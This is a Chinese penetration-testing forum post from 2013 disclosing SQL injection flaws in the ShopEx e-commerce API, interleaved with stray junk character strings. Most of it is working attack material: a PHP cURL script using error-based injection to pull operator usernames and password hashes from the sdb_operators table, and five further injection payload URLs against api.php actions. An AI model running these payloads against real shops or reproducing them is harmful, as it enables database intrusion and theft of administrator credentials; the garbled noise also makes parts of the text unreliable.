中国网络渗透测试联盟

标题: shopEx最新版的API注入漏洞分析附利用exp [打印本页]

作者: admin    时间: 2013-7-27 18:34
标题: shopEx最新版的API注入漏洞分析附利用exp
缺陷文件:\core\api\payment\2.0\api_b2b_2_0_payment_cfg.php% ?; a% a# ?6 l
core\api\payment\1.0\api_b2b_2_0_payment_cfg.php
/ g9 p6 T, r0 R7 p8 V5 T
' V9 [0 ?" J) {, l; T第44行 $data['columns'] 未做过滤导致注入9 }( h, z0 y+ L. |: h

$ j$ s/ R/ A3 n* |4 n+ F& P: m<?php set_time_limit(0); ob_flush(); echo 'Test: http://localhost:808'."\r\n"; $sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1'; $url='http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0'; $ch = curl_init(); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POSTFIELDS, $sql); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); flush(); $data = curl_exec($ch); echo $data; curl_close($ch); ?>外带一句 ShopEx对API操作的模块未做认证,任何用户都可访问,攻击者可通过它来对产品的分类,类型,规格,品牌等,进行添加,删除和修改,过滤不当还可造成注入.
7 B0 k9 O& y2 v% A. p8 G- h4 @- @
0 U/ |3 _" c5 A; s( J注射1:2 A7 X1 d$ D7 ]2 Q/ P* N9 E8 c- T+ {9 m/ [
, K: t1 b( N  P  L  m4 e4 z
http://www.0day5.com/api.php POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#
) e+ B8 x) m- O: x1 l* Q0 Z
9 M$ Q6 r# O" O# R1 s注射2:
+ g1 a; B# o) G- M- Uhttp://www.0day5.com/shopex/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}7 Q; k3 `0 g$ b$ y8 O2 e# {: j

" a" R) E* V! J' ?注射3:  p- D9 j) H4 v) ?! V3 H
  http://www.0day5.com/shopex/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx
' d7 L6 [. k! z2 [- m注射4:: N. t  o/ h) v3 w  F1 \1 d
. d- u+ ~9 P+ z
http://www.0day5.com/shopex/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1¤cy=1' n8 S% q" E* p7 ]! W

9 |5 a1 H: b: `( R3 b/ ?  ?4 R3 V' u: @6 C" L
注射5:
" Q9 R; c% i& o+ A4 j  http://www.0day5.com/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx
: S5 @. F1 ^' J0 X6 E5 j* e$ B3 O) N% t

# p+ h; E$ \" m) L8 M' i! F- f: g9 `1 N
. O; ]3 }! p& {/ d6 F
0 i6 R6 u* v3 i# z( R5 X
* L4 Q3 ?$ ]5 m7 M; F; N8 h! R' G: K  P( S1 L% k





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2